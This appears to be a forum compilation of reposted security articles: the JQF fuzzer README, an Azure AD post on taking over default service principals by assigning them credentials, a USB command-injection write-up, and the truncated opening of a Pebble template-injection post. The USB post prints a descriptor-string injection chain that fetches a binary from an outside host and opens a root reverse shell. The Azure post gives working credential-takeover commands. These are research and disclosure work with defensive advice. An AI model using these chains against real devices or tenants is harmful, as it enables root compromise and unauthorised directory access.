JQF supports the Zest algorithm, which uses code-coverage and input-validity feedback to bias a QuickCheck-style generator towards generating structured inputs that can reveal deep semantic bugs. JQF extracts code coverage using bytecode instrumentation, and input validity using JUnit's Assume API. An input is valid if no assumptions are violated.

Documentation

Tutorials

Zest 101: A basic tutorial for fuzzing a standalone toy program using command-line scripts. Walks through the process of writing a test driver and structured input generator for Calendar objects.
Fuzzing a compiler with Zest: A tutorial for fuzzing a non-trivial program -- the Google Closure Compiler -- using a generator for JavaScript programs. This tutorial makes use of the JQF Maven plugin.
Fuzzing with AFL: A tutorial for fuzzing a Java program that parses binary data, such as PNG image files, using the AFL binary fuzzing engine.
Fuzzing with ZestCLI: A tutorial for fuzzing a Java program with ZestCLI.

Continuous Fuzzing

Just like unit tests, fuzzing is advised to be run continuously with your CI as your code grows and develops. Currently there is one service that offers continuous fuzzing as a service based on JQF/Zest: fuzzit.dev (tutorial).

Additional Details

The JQF wiki contains lots more documentation, including:

Using a custom fuzz guidance
Performance Benchmarks

JQF also publishes its API docs.

Contact the developers

We want your feedback! (haha, get it? get it?)

If you've found a bug in JQF or are having trouble getting JQF to work, please open an issue on the issue tracker. You can also use this platform to post feature requests. If it's some sort of fuzzing emergency, you can always send an email to the main developer: Rohan Padhye.

Trophies

If you find bugs with JQF and you are comfortable with sharing, we would be happy to add them to this list. Please send a PR for README.md with a link to the bug/CVE you found.
google/closure-compiler#2842: IllegalStateException in VarCheck: Unexpected variable
google/closure-compiler#2843: NullPointerException when using Arrow Functions in dead code
google/closure-compiler#3173: Algorithmic complexity / performance issue on fuzzed input
google/closure-compiler#3220: ExpressionDecomposer throws IllegalStateException: Object method calls can not be decomposed
JDK-8190332: PngReader throws NegativeArraySizeException when width is too large
JDK-8190511: PngReader throws OutOfMemoryError for very small malformed PNGs
JDK-8190512: PngReader throws undocumented IllegalArgumentException: "Empty Region" instead of IOException for malformed images with negative dimensions
JDK-8190997: PngReader throws NullPointerException when PLTE section is missing
JDK-8191023: PngReader throws NegativeArraySizeException in parse_tEXt_chunk when keyword length exceeds chunk size
JDK-8191076: PngReader throws NegativeArraySizeException in parse_zTXt_chunk when keyword length exceeds chunk size
JDK-8191109: PngReader throws NegativeArraySizeException in parse_iCCP_chunk when keyword length exceeds chunk size
JDK-8191174: PngReader throws undocumented IllegalArgumentException with message "Pixel stride times width must be <= scanline stride"
JDK-8191073: JpegImageReader throws IndexOutOfBoundsException when reading malformed header
JDK-8193444: SimpleDateFormat throws ArrayIndexOutOfBoundsException when format contains long sequences of unicode characters
JDK-8193877: DateTimeFormatterBuilder throws ClassCastException when using padding
mozilla/rhino#405: FAILED ASSERTION due to malformed destructuring syntax
mozilla/rhino#406: ClassCastException when compiling malformed destructuring expression
mozilla/rhino#407: java.lang.VerifyError in bytecode produced by CodeGen
mozilla/rhino#409: ArrayIndexOutOfBoundsException when parsing '<!-'
mozilla/rhino#410: NullPointerException in BodyCodeGen
COLLECTIONS-714: PatriciaTrie ignores trailing null characters in keys
COMPRESS-424: BZip2CompressorInputStream throws ArrayIndexOutOfBoundsException(s) when decompressing malformed input
LANG-1385: StringIndexOutOfBoundsException in NumberUtils.createNumber
CVE-2018-11771: Infinite Loop in Commons-Compress ZipArchiveInputStream (found by Tobias Ospelt)
MNG-6375 / plexus-utils#34: NullPointerException when pom.xml has incomplete XML tag
MNG-6374 / plexus-utils#35: ModelBuilder hangs with malformed pom.xml
MNG-6577 / plexus-utils#57: Uncaught IllegalArgumentException when parsing unicode entity ref
Bug 62655: Augment task: IllegalStateException when "id" attribute is missing
BCEL-303: AssertionViolatedException in Pass 3A Verification of invoke instructions
BCEL-307: ClassFormatException thrown in Pass 3A verification
BCEL-308: NullPointerException in Verifier Pass 3A
BCEL-309: NegativeArraySizeException when Code attribute length is negative
BCEL-310: ArrayIndexOutOfBounds in Verifier Pass 3A
BCEL-311: ClassCastException in Verifier Pass 2
BCEL-312: AssertionViolation: INTERNAL ERROR Please adapt StringRepresentation to deal with ConstantPackage in Verifier Pass 2
BCEL-313: ClassFormatException: Invalid signature: Ljava/lang/String)V in Verifier Pass 3A
CVE-2018-8036: Infinite Loop leading to OOM in PDFBox's AFMParser (found by Tobias Ospelt)
PDFBOX-4333: ClassCastException when loading PDF (found by Robin Schimpf)
PDFBOX-4338: ArrayIndexOutOfBoundsException in COSParser (found by Robin Schimpf)
PDFBOX-4339: NullPointerException in COSParser (found by Robin Schimpf)
CVE-2018-8017: Infinite Loop in IptcAnpaParser
CVE-2018-12418: Infinite Loop in junrar (found by Tobias Ospelt)

Sursa: https://github.com/rohanpadhye/jqf
-
Azure AD privilege escalation - Taking over default application permissions as Application Admin

5 minute read

During both my DEF CON and Troopers talks I mentioned a vulnerability that existed in Azure AD where an Application Admin or a compromised On-Premise Sync Account could escalate privileges by assigning credentials to applications. When revisiting this topic I found out the vulnerability was actually not fixed by Microsoft, and that there are still methods to escalate privileges using default Office 365 applications. In this blog I explain the why and how. The escalation is still possible since this behaviour is considered to be "by-design" and thus remains a risk.

Applications and Service Principals

In Azure AD there is a distinction between Applications and Service Principals. An application is the configuration of an application, whereas the Service Principal is the security object that can actually have privileges in the Azure directory. This can be quite confusing, as in the documentation they are usually both called applications. The Azure portal makes it even more confusing by calling Service Principals "Enterprise Applications" and hiding most properties of the service principals from view. For Office 365 and other Microsoft applications, the Application definition is present in one of Microsoft's dedicated Azure directories. In an Office 365 tenant, service principals are created for these applications automatically, giving an Office 365 Azure AD about 200 service principals by default that all have different pre-assigned permissions.

Application roles

The way Azure AD applications work is that they can define roles, which can then be assigned to users, groups or service principals. If you read the documentation for the Microsoft Graph permissions, you can see permissions such as Directory.Read.All. These are actually roles defined in the Microsoft Graph application, which can be assigned to service principals. In the documentation and Azure Portal, these roles are called "Application permissions", but we're sticking to the API terminology here.

The roles defined in the Microsoft Graph application can be queried using the AzureAD PowerShell module. When we try to query for applications that have been assigned one or more roles, we can see that in my test directory the appadmintest app has a few roles assigned (though it's not exactly clear what roles those are, since there's a lot of GUID references).

There is however no way to query within an Azure AD which roles have been assigned to default Microsoft applications, so to enumerate this we have to get a bit creative. An Application Administrator (or the On-Premise Sync account, if you are escalating from on-premise to the cloud) can assign credentials to an application, after which this application can log in using the client credential grant OAuth2 flow. Assigning credentials is possible using PowerShell:

PS C:\> $sp = Get-AzureADServicePrincipal -searchstring "Microsoft StaffHub"
PS C:\> New-AzureADServicePrincipalPasswordCredential -objectid $sp.ObjectId -EndDate "31-12-2099 12:00:00" -StartDate "6-8-2018 13:37:00" -Value redactedpassword

CustomKeyIdentifier :
EndDate             : 31-12-2099 12:00:00
KeyId               :
StartDate           : 6-8-2018 13:37:00
Value               : redactedpassword

After this we can log in using some Python code and have a look at the issued access token.
This JWT displays the roles the application has in the Microsoft Graph:

import requests
import json
import jwt
import pprint

# This should include the tenant name/id
AUTHORITY_URL = 'https://login.microsoftonline.com/ericsengines.onmicrosoft.com'
TOKEN_ENDPOINT = '/oauth2/token'

data = {'client_id': 'aa580612-c342-4ace-9055-8edee43ccb89',
        'resource': 'https://graph.microsoft.com',
        'client_secret': 'redactedpassword',
        'grant_type': 'client_credentials'}

r = requests.post(AUTHORITY_URL + TOKEN_ENDPOINT, data=data)
data2 = r.json()
try:
    jwtdata = jwt.decode(data2['access_token'], verify=False)
    pprint.pprint(jwtdata)
except KeyError:
    pass

This will print the data from the token, containing the "roles" field:

{
  "aio": "42FgYJg946pl8aLnJXPOnn4zTe/mBwA=",
  "app_displayname": "Microsoft StaffHub",
  "appid": "aa580612-c342-4ace-9055-8edee43ccb89",
  "appidacr": "1",
  "aud": "https://graph.microsoft.com",
  "exp": 1567200473,
  "iat": 1567171373,
  "idp": "https://sts.windows.net/50ad18e1-bb23-4466-9154-bc92e7fe3fbb/",
  "iss": "https://sts.windows.net/50ad18e1-bb23-4466-9154-bc92e7fe3fbb/",
  "nbf": 1567171373,
  "oid": "56748bde-f24d-4a5b-aa2d-c88b175dfc80",
  "roles": ["Directory.ReadWrite.All", "Mail.Read", "Group.Read.All", "Files.Read.All", "Group.ReadWrite.All"],
  "sub": "56748bde-f24d-4a5b-aa2d-c88b175dfc80",
  "tid": "50ad18e1-bb23-4466-9154-bc92e7fe3fbb",
  "uti": "2GScBJopwk2e3EFce7pgAA",
  "ver": "1.0",
  "xms_tcdt": 1559139940
}

This method only seemed to work for the Microsoft Graph (and not for the Azure AD Graph). I am unsure if this is because no apps have permissions on the Azure AD Graph or if the system used for these permissions is different. If we perform this action for all ~200 default apps in an Office 365 tenant, we get an overview of all the permissions these applications have. Below is an overview of the most interesting permissions that I've identified.
Application name                        AppId                                 Access
Microsoft Forms                         c9a559d2-7aab-4f13-a6ed-e7e9c52aec87  Sites.ReadWrite.All
Microsoft Forms                         c9a559d2-7aab-4f13-a6ed-e7e9c52aec87  Files.ReadWrite.All
Microsoft Cloud App Security            05a65629-4c1b-48c1-a78b-804c4abdd4af  Sites.ReadWrite.All
Microsoft Cloud App Security            05a65629-4c1b-48c1-a78b-804c4abdd4af  Sites.FullControl.All
Microsoft Cloud App Security            05a65629-4c1b-48c1-a78b-804c4abdd4af  Files.ReadWrite.All
Microsoft Cloud App Security            05a65629-4c1b-48c1-a78b-804c4abdd4af  Group.ReadWrite.All
Microsoft Cloud App Security            05a65629-4c1b-48c1-a78b-804c4abdd4af  User.ReadWrite.All
Microsoft Cloud App Security            05a65629-4c1b-48c1-a78b-804c4abdd4af  IdentityRiskyUser.ReadWrite.All
Microsoft Teams                         1fec8e78-bce4-4aaf-ab1b-5451cc387264  Sites.ReadWrite.All
Microsoft StaffHub                      aa580612-c342-4ace-9055-8edee43ccb89  Directory.ReadWrite.All
Microsoft StaffHub                      aa580612-c342-4ace-9055-8edee43ccb89  Group.ReadWrite.All
Microsoft.Azure.SyncFabric              00000014-0000-0000-c000-000000000000  Group.ReadWrite.All
Microsoft Teams Services                cc15fd57-2c6c-4117-a88c-83b1d56b4bbe  Sites.ReadWrite.All
Microsoft Teams Services                cc15fd57-2c6c-4117-a88c-83b1d56b4bbe  Group.ReadWrite.All
Office 365 Exchange Online              00000002-0000-0ff1-ce00-000000000000  Group.ReadWrite.All
Microsoft Office 365 Portal             00000006-0000-0ff1-ce00-000000000000  User.ReadWrite.All
Microsoft Office 365 Portal             00000006-0000-0ff1-ce00-000000000000  AuditLog.Read.All
Azure AD Identity Governance Insights   58c746b0-a0b0-4647-a8f6-12dde5981638  AuditLog.Read.All
Kaizala Sync Service                    d82073ec-4d7c-4851-9c5d-5d97a911d71d  Group.ReadWrite.All

So the TL;DR is that if you compromise an Application Administrator account or the on-premise Sync Account, you can read and modify directory settings, group memberships, user accounts, SharePoint sites and OneDrive files. This is done by assigning credentials to an existing service principal with these permissions and then impersonating these applications. You can exploit this by assigning a password or certificate to a service principal and then logging in as that service principal. I use Python for logging in with a service principal password, since the PowerShell module doesn't support this (it does support certificates, but those are more complex to set up). The below command shows that when logging in with such a certificate, we do have the power to modify group memberships (something the application admin normally doesn't have):

PS C:\> add-azureadgroupmember -RefObjectId 2730f622-db95-4b40-9be7-6d72b6c1dad4 -ObjectId 3cf7196f-9d57-48ee-8912-dbf50803a4d8
PS C:\> Get-AzureADGroupMember -ObjectId 3cf7196f-9d57-48ee-8912-dbf50803a4d8

ObjectId                             DisplayName UserPrincipalName                 UserType
--------                             ----------- -----------------                 --------
2730f622-db95-4b40-9be7-6d72b6c1dad4 Mark        mark@bobswrenches.onmicrosoft.com Member

In the Azure AD audit log, the actions are shown as performed by "Microsoft StaffHub", and thus nothing in the log indicates these actions were actually performed by the application administrator.

Thoughts and disclosure process

I don't really see why credentials can be assigned to default service principals this way, or what a legitimate purpose for this would be. In my opinion, it shouldn't be possible to assign credentials to first-party Microsoft applications. The Azure portal doesn't offer this option and does not display these "backdoor" service principal credentials, but APIs such as the Microsoft Graph and Azure AD Graph have no such limitations.
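On the defensive side, the same APIs that enable this backdooring also make it possible to hunt for it. Below is a minimal Python sketch (using only the requests library) that lists service principals with password or key credentials assigned. It assumes you have already obtained a Microsoft Graph access token with rights to read service principals; token acquisition is omitted, and the endpoint and property names come from the Microsoft Graph v1.0 servicePrincipal resource.

import requests

GRAPH = 'https://graph.microsoft.com/v1.0'
TOKEN = '<access token able to read service principals>'  # acquisition not shown

def sps_with_credentials(token):
    # page through all service principals, keeping only those that have
    # password or key credentials assigned
    url = (GRAPH + '/servicePrincipals'
           '?$select=displayName,appId,passwordCredentials,keyCredentials')
    headers = {'Authorization': 'Bearer ' + token}
    while url:
        page = requests.get(url, headers=headers).json()
        for sp in page.get('value', []):
            if sp.get('passwordCredentials') or sp.get('keyCredentials'):
                yield sp['displayName'], sp['appId']
        url = page.get('@odata.nextLink')  # absent on the last page

for name, app_id in sps_with_credentials(TOKEN):
    print('{0} ({1}) has credentials assigned'.format(name, app_id))

Any first-party Microsoft service principal that shows up in such a listing deserves immediate scrutiny.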
When I reported the fact that a privilege escalation is still possible this way (even after I was told it was fixed last year), I got a reply back from MSRC stating that Application Administrators assigning credentials to applications and obtaining more rights is documented and thus not a vulnerability. If you are administering an Azure AD environment, I recommend implementing checks for credentials being assigned to default service principals, and regularly reviewing who controls the credentials of applications with high privileges.

Updated: September 16, 2019

Sursa: https://dirkjanm.io/azure-ad-privilege-escalation-application-admin/
-
Command Injection with USB Peripherals

by Danny Rosseau | Aug 22, 2019

When this Project Zero report came out I started thinking more about USB as an interesting attack surface for IoT devices. Many of these devices allow users to plug in a USB device and then automatically perform some actions with it, and that automatic functionality may be too trusting of the USB device. That post got filed away in my mind and mostly forgotten for a while, until an IoT device showed up at my door sporting a USB port. Sadly, I hadn't yet gotten the mentioned Raspberry Pi Zero, and shipping would probably take longer than my attention span would allow, but a coworker mentioned that Android has ConfigFS support, so I decided to investigate that route instead. But let's back up a bit and set the scene.

I had discovered that the IoT device in question would automatically mount any USB mass storage device that was connected to it and, if certain properties on the device were set, would use those properties — unsanitized — to create the mount directory name. Furthermore, this mounting would happen via a call to C's infamous system function: a malicious USB device could potentially set these parameters in such a way as to get arbitrary command execution. Since the responsible daemon was running as root, this meant that I might be able to plug a USB device in, wait a couple of seconds, and then have command execution as root on the device. This naturally triggered my memories of all of those spy movies where the protagonist plugs something into a door's highly sophisticated lock, which makes a bunch of numbers flash on the LED screen, magically opens the door, and makes them succinctly claim "I'm in" in a cool tone. I wanted to do that.

I was fairly certain my attack would work, but I wasn't very familiar with turning my Android device into a custom USB peripheral, and searches were mostly lacking a solution. This post is intended to supplement those lacking internet searches. If you want to follow along at home, I'm using a rooted Nexus 5X device running the last Android version it supports: 8.1. I'm not sure how different things are in Android 9 land.

Android as a Mass Storage Device

For my purposes, I need my Android device to show up as a USB mass storage device with the following properties controlled by me: the product name string, the product model string, and the disk label. You can customize much more than that, but I don't care about the rest. We'll start with what didn't seem to work for me: I had a passing familiarity with ConfigFS and saw a /config/usb_gadget, so I figured I'd just use that to make a quick mass storage USB device using the ConfigFS method that I knew about. I wrote up a quick script to create all of the entries, but upon testing it I ran into this:

mkdir: '/config/usb_gadget/g1/functions/mass_storage.0': Function not implemented

I'm still not sure why that route didn't work, but apparently this method just isn't supported. I was stumped for a bit and started digging into the Android and Linux kernel source code before taking a step back. I didn't want to fall into the rabbit hole that was reading obscure kernel code: I just wanted to /bin/touch /tmp/haxxed on this device and declare myself 1337. So I left kernel land for Android init land to see what the Android devs do to change USB functionality.
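For the curious, the generic Linux ConfigFS gadget setup (the route that failed above) looks roughly like the following. This is only a sketch, assuming configfs is mounted at /config, a UDC is present under /sys/class/udc, and Python is available on the device; on this phone, the mkdir of the mass_storage function is exactly the step that returned "Function not implemented".

import os

G = '/config/usb_gadget/g1'  # standard Linux gadget ConfigFS layout

def write(path, value):
    with open(path, 'w') as f:
        f.write(value)

# create the gadget, its string table, a config, and a mass storage function;
# on the Nexus 5X the functions/mass_storage.0 mkdir is the step that failed
os.makedirs(G + '/strings/0x409', exist_ok=True)
os.makedirs(G + '/configs/c.1', exist_ok=True)
os.makedirs(G + '/functions/mass_storage.0', exist_ok=True)

write(G + '/idVendor', '0x18d1')
write(G + '/idProduct', '0x4ee7')
write(G + '/strings/0x409/manufacturer', 'LGE')
write(G + '/strings/0x409/product', 'Nexus 5X')
write(G + '/functions/mass_storage.0/lun.0/file', '/data/local/tmp/backing.img')

# bind the function into the configuration, then attach the gadget to the UDC
os.symlink(G + '/functions/mass_storage.0', G + '/configs/c.1/mass_storage.0')
write(G + '/UDC', os.listdir('/sys/class/udc')[0])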
Taking a look at some Android init files here, you'll notice that there are two different .rc files for USB: init.usb.configfs.rc and init.usb.rc. Keen observers (see: people who actually clicked those links) will see that each one has a check for the property sys.usb.configfs: if it is 1, the entries in the init.usb.configfs.rc file are used; otherwise the init.usb.rc entries are used. For me, sys.usb.configfs was 0, and I confirmed that things were being modified over in the /sys/class/android_usb directory, so I shifted my focus there. I haven't gone back to investigate what would happen with sys.usb.configfs set to 1, so I'm not going to claim this is the only way to do this, but it is the way that worked for me.

Exploring Unknown Lands

Now that I've shifted my focus to the /sys/class/android_usb/android0 directory, let's explore that. I see the following:

bullhead:/sys/class/android_usb/android0 # ls
bDeviceClass            f_acm           f_ffs           f_rmnet      iManufacturer            power
bDeviceProtocol         f_audio         f_gps           f_rmnet_smd  iProduct                 remote_wakeup
bDeviceSubClass         f_audio_source  f_mass_storage  f_rndis      iSerial                  state
bcdDevice               f_ccid          f_midi          f_rndis_qc   idProduct                subsystem
down_pm_qos_sample_sec  f_charging      f_mtp           f_serial     idVendor                 uevent
down_pm_qos_threshold   f_diag          f_ncm           f_uasp       idle_pc_rpm_no_int_secs  up_pm_qos_sample_sec
enable                  f_ecm           f_ptp           f_usb_mbim   pm_qos                   up_pm_qos_threshold
f_accessory             f_ecm_qc        f_qdss          functions    pm_qos_state

idVendor, idProduct, iProduct, iManufacturer, and f_mass_storage look slightly familiar. If you are familiar with ConfigFS, the contents of f_mass_storage also look similar to the contents of the mass_storage function:

bullhead:/sys/class/android_usb/android0 # ls f_mass_storage
device  inquiry_string  lun  luns  power  subsystem  uevent
bullhead:/sys/class/android_usb/android0 # ls f_mass_storage/lun
file  nofua  power  ro  uevent

It is at this point that, if I were a less honest person, I'd tell you I know what is going on here. I don't. My goal is just to hack the thing by making a malicious USB device, not learn the inner workings of the Linux kernel and how Android sets itself up as a USB peripheral. I intend to go deeper into this later, and will perhaps write a more comprehensive blog post at that point. There are plenty of hints around the source code and on the device itself that help figure out how to use this directory. One thing I see happening in init.usb.rc all the time is this pattern:

write /sys/class/android_usb/android0/enable 0
....
write /sys/class/android_usb/android0/functions ${sys.usb.config}
write /sys/class/android_usb/android0/enable 1

So what is functions set to when I just have a developer device plugged in and am using ADB?

bullhead:/sys/class/android_usb/android0 # cat functions
ffs

I happen to know that ADB on the device is implemented using FunctionFS, and ffs looks like shorthand for FunctionFS to me, so it makes sense that it would be enabled. I'm probably going to have to change that value, so let's go ahead and set it to mass_storage and see what happens.

bullhead:/sys/class/android_usb/android0 # echo 0 > enable

And my ADB session dies. Right, you can't just kill USB and expect to use a USB connection. Well, at least I know it works! Luckily ADB is nice enough to also work over TCP/IP, so I can restart and:

adb tcpip 5555
adb connect 192.168.1.18:5555

For the record, I wouldn't go doing that on your local coffee shop WiFi. OK, now that we're connected — using the magic of photons — we can bring down USB and change to mass storage and see what happens.
bullhead:/sys/class/android_usb/android0 # echo 0 > enable
bullhead:/sys/class/android_usb/android0 # echo mass_storage > functions
bullhead:/sys/class/android_usb/android0 # echo 1 > enable

Cool, no errors or crashes or anything. If you're familiar with ConfigFS you'll probably also know that I can modify f_mass_storage/lun/file to give some backing storage for the mass storage device. If you're not familiar with ConfigFS, you know that now: nice! If you already know how to make an image to back your USB mass storage device, you're smarter than I was about a week ago and can probably skip the next section.

Making Images

One thing to keep in mind when making the image is that I need to be able to control the disk LABEL value (as seen by blkid). We'll make a file and just use that instead of doing anything fancy. Note that I didn't actually care about writing things to the USB's disk: I just wanted it to be recognized by the target device as a mass storage device so that it would be mounted. To make our backing image file, then, we'll start off with a whole lot of nothing:

dd if=/dev/zero of=backing.img count=50 bs=1M

This will create a 50MB file named backing.img that is all 0s. That is pretty useless; we're going to need to format it with fdisk. A more adept Linux hacker would probably know how to script this, but I, being an intellectual, did it this way:

echo -e -n 'o\nn\n\n\n\n\nt\nc\nw\n' | fdisk backing.img

That magic is filling out the fdisk entries for you. It looks like this:

Welcome to fdisk (util-linux 2.31.1).
Changes will remain in memory only, until you decide to write them.
Be careful before using the write command.

Device does not contain a recognized partition table.
Created a new DOS disklabel with disk identifier 0xd643eccd.

Command (m for help): Created a new DOS disklabel with disk identifier 0x50270950.

Command (m for help): Partition type
   p   primary (0 primary, 0 extended, 4 free)
   e   extended (container for logical partitions)
Select (default p):

Using default response p.
Partition number (1-4, default 1):
First sector (2048-20479, default 2048):
Last sector, +sectors or +size{K,M,G,T,P} (2048-20479, default 20479):

Created a new partition 1 of type 'Linux' and of size 9 MiB.

Command (m for help): Selected partition 1
Hex code (type L to list all codes):

Changed type of partition 'Linux' to 'W95 FAT32 (LBA)'.

Command (m for help): The partition table has been altered.
Syncing disks.

We're making an image with a DOS partition table and a single FAT32 partition, with everything else being the default. Cool. We need to do some formatting and labelling now:

# losetup --offset 1048576 -f backing.img /dev/loop0
# mkdosfs -n "HAX" /dev/loop0
# losetup -d /dev/loop0

The magic 1048576 is 2048 * 512, which is the first sector times the sector size. Here we just attach our image as the /dev/loop0 device and run a simple mkdosfs: the -n "HAX" is important in my case, as that gives me control over the LABEL. That's all you need to do. Easy.

Bringing it all Together

Armed with our image we can now make the full USB device:

$ adb tcpip 5555
$ adb connect 192.168.1.18:5555
$ adb push backing.img /data/local/tmp/
$ adb shell

And in the adb shell:

$ su
# echo 0 > /sys/class/android_usb/android0/enable
# echo '/data/local/tmp/backing.img' > /sys/class/android_usb/android0/f_mass_storage/lun/file
# echo 'mass_storage' > /sys/class/android_usb/android0/functions
# echo 1 > /sys/class/android_usb/android0/enable

If all goes well:

# lsusb -v -d 18d1:
Bus 003 Device 036: ID 18d1:4ee7 Google Inc.
Device Descriptor:
  bLength                18
  bDescriptorType         1
  bcdUSB               2.00
  bDeviceClass            0 (Defined at Interface level)
  bDeviceSubClass         0
  bDeviceProtocol         0
  bMaxPacketSize0        64
  idVendor           0x18d1 Google Inc.
  idProduct          0x4ee7
  bcdDevice            3.10
  iManufacturer           1 LGE
  iProduct                2 Nexus 5X
  iSerial                 3 0000000000000000
  bNumConfigurations      1
  Configuration Descriptor:
    bLength                 9
    bDescriptorType         2
    wTotalLength           32
    bNumInterfaces          1
    bConfigurationValue     1
    iConfiguration          0
    bmAttributes         0x80
      (Bus Powered)
    MaxPower              500mA
    Interface Descriptor:
      bLength                 9
      bDescriptorType         4
      bInterfaceNumber        0
      bAlternateSetting       0
      bNumEndpoints           2
      bInterfaceClass         8 Mass Storage
      bInterfaceSubClass      6 SCSI
      bInterfaceProtocol     80 Bulk-Only
      iInterface              5 Mass Storage
      Endpoint Descriptor:
        bLength                 7
        bDescriptorType         5
        bEndpointAddress     0x81  EP 1 IN
        bmAttributes            2
          Transfer Type            Bulk
          Synch Type               None
          Usage Type               Data
        wMaxPacketSize     0x0200  1x 512 bytes
        bInterval               0
      Endpoint Descriptor:
        bLength                 7
        bDescriptorType         5
        bEndpointAddress     0x01  EP 1 OUT
        bmAttributes            2
          Transfer Type            Bulk
          Synch Type               None
          Usage Type               Data
        wMaxPacketSize     0x0200  1x 512 bytes
        bInterval               1
Device Qualifier (for other device speed):
  bLength                10
  bDescriptorType         6
  bcdUSB               2.00
  bDeviceClass            0 (Defined at Interface level)
  bDeviceSubClass         0
  bDeviceProtocol         0
  bMaxPacketSize0        64
  bNumConfigurations      1
Device Status:     0x0000
  (Bus Powered)

You can see the device here:

$ ls -lh /dev/disk/by-id
lrwxrwxrwx 1 root root  9 Aug  2 14:35 usb-Linux_File-CD_Gadget_0000000000000000-0:0 -> ../../sdb
lrwxrwxrwx 1 root root 10 Aug  2 14:35 usb-Linux_File-CD_Gadget_0000000000000000-0:0-part1 -> ../../sdb1

And you should be able to mount:

$ mkdir HAX && sudo mount /dev/sdb1 HAX

I felt like Neo when that worked. Right now this is just a glorified thumb drive though. The real fun comes with the fact that we can change parameters:

# echo 0 > /sys/class/android_usb/android0/enable
# echo 1337 > /sys/class/android_usb/android0/idProduct
# echo 'Carve Systems' > /sys/class/android_usb/android0/iManufacturer
# echo '1337 Hacking Team' > /sys/class/android_usb/android0/iProduct
# echo 1 > /sys/class/android_usb/android0/enable

$ lsusb -v -d 18d1:
Bus 003 Device 044: ID 18d1:1337 Google Inc.
Device Descriptor:
....
  idProduct          0x1337
....
  iManufacturer           1 Carve Systems
  iProduct                2 1337 Hacking USB
....

Wow does that make it easy to make a malicious USB device.

Hacking the Thing

To bring everything full circle, I'll go through the actual exploit that inspired this. The code I was exploiting looked somewhat similar to this:

snprintf(dir, DIR_SIZE, "/mnt/storage/%s%s%s", LABEL, iManufacturer, iProduct);
snprintf(cmd, CMD_SIZE, "mount %s %s", /dev/DEVICE, dir);
system(cmd);

My proof of concept exploit was the following:

1. Drop a shell script at the vulnerable daemon's cwd that will spawn a reverse shell
2. Execute that file with sh

One tricky bit is that they were removing whitespace and / from those variables, but luckily system was passing to a shell that understands $IFS and sub-shells.
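That substitution is mechanical, so it is easy to script. Here is a hypothetical Python helper for the space-encoding part; the slash handling, done in the chain below by planting a b=/ variable via printf, still has to be escaped by hand.

def ifs_encode(cmd):
    # the daemon strips literal spaces, but the target shell will expand
    # $IFS back into whitespace when the injected string is evaluated
    return ';' + cmd.replace(' ', '${IFS}') + ';'

print(ifs_encode('sh a'))  # -> ;sh${IFS}a;  (the final stage used below)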
Once I had the Android device set up, exploiting this issue was straightforward; commands would be built as follows:

echo 0 > enable
echo ';{cmd};' > iProduct
echo 1 > enable

With the entire command chain looking like this (I removed some sleep commands that were necessary):

# echo 0 > /sys/class/android_usb/android0/enable
# echo ';echo${IFS}b=`printf$IFS'"'"'\\x2f'"'"'`>>a;' > /sys/class/android_usb/android0/iProduct
# echo 1 > /sys/class/android_usb/android0/enable
# echo 0 > /sys/class/android_usb/android0/enable
# echo ';echo${IFS}s=\"$IFS\">>a;' > /sys/class/android_usb/android0/iProduct
# echo 1 > /sys/class/android_usb/android0/enable
# echo 0 > /sys/class/android_usb/android0/enable
# echo ';echo${IFS}u=http:\$b\${b}192.168.1.152:8000\${b}shell>>a;' > /sys/class/android_usb/android0/iProduct
# echo 1 > /sys/class/android_usb/android0/enable
# echo 0 > /sys/class/android_usb/android0/enable
# echo ';echo${IFS}curl\$s-s\$s-o\${s}shell\$s\$u>>a;' > /sys/class/android_usb/android0/iProduct
# echo 1 > /sys/class/android_usb/android0/enable
# echo 0 > /sys/class/android_usb/android0/enable
# echo ';echo${IFS}chmod\$s+x\${s}shell>>a;' > /sys/class/android_usb/android0/iProduct
# echo 1 > /sys/class/android_usb/android0/enable
# echo 0 > /sys/class/android_usb/android0/enable
# echo ';echo${IFS}\${b}shell>>a;' > /sys/class/android_usb/android0/iProduct
# echo 1 > /sys/class/android_usb/android0/enable
# echo 0 > /sys/class/android_usb/android0/enable
# echo ';sh${IFS}a;' > /sys/class/android_usb/android0/iProduct
# echo 1 > /sys/class/android_usb/android0/enable

All of those commands together create the following file (/a):

b=/
s=" "
u=http:$b${b}192.168.1.152:8000${b}shell
curl$s-s$s-o${s}shell$s$u
chmod$s+x${s}shell
${b}shell

The last command executes the file with sh a. This script pulls a binary I wrote to get a reverse shell. You could send your favorite reverse shell payload, but this way is always simple and makes verification quick. Upon the last command being executed, we're greeted with the familiar:

$ nc -l -p 3567
id
uid=0(root) gid=0(root) groups=0(root)

Nice.

Takeaways

While it is probably easier to get yourself a Raspberry Pi Zero, it is pretty handy that this can be done so easily through a rooted Android device. As for security takeaways: it is important to remember that ANY external input, even from physical devices, is not trustworthy. Also, blacklists can sometimes leave holes that are easy to bypass. There were many ways to avoid this issue, but the most important part of any mitigation would be to not trust properties pulled off of an external device. If you need a unique name, generate a UUID. If you need a unique name that is constant for a given device, verify the required parameters exist and then hash them using SHA256 or your favorite hashing algorithm (a quick sketch of this idea follows below). The system C function should also be used sparingly: it is fairly straightforward to mount drives using just C code.

Sursa: https://carvesystems.com/news/command-injection-with-usb-peripherals/
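Picking up that hashing takeaway: the vulnerable code was C, but purely as an illustration, the idea looks like this in Python (the function and path names are hypothetical).

import hashlib
import os
import subprocess

def mount_dir_for(label, manufacturer, product):
    # derive a fixed-format, shell-safe directory name from the untrusted
    # USB strings instead of pasting them verbatim into a command line
    digest = hashlib.sha256('\0'.join([label, manufacturer, product])
                            .encode('utf-8')).hexdigest()[:32]
    return os.path.join('/mnt/storage', digest)

def mount(device, label, manufacturer, product):
    target = mount_dir_for(label, manufacturer, product)
    if not os.path.isdir(target):
        os.makedirs(target)
    # argv form: no shell is involved, so metacharacters in the inputs are inert
    subprocess.check_call(['mount', device, target])

The same device always maps to the same directory, but nothing attacker-controlled ever reaches a shell.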
-
Server Side Template Injection – on the example of Pebble

Michał Bentkowski | September 17, 2019 | Research

Server-Side Template Injection isn't exactly a new vulnerability in the world of web applications. It was made famous in 2015 by James Kettle in his well-known post on the PortSwigger blog. In this post, I'll share our journey with another, less popular Java templating engine called Pebble.

Pebble and template injection

According to its official page, Pebble is a Java templating engine inspired by Twig. It features template inheritance and easy-to-read syntax, ships with built-in autoescaping for security, and includes integrated support for internationalization. It supports one of the most common syntaxes in templating engines, in which variable substitution is done with {{ variable }}. More often than not, templating engines make it possible to include arbitrary Java expressions. Imagine that you have a variable called name and you want to put it upper-case in the template; then you can use {{ name.toUpperCase() }}.

The usual way of exploiting template injection in various expression languages in Java is to use code similar to the following:

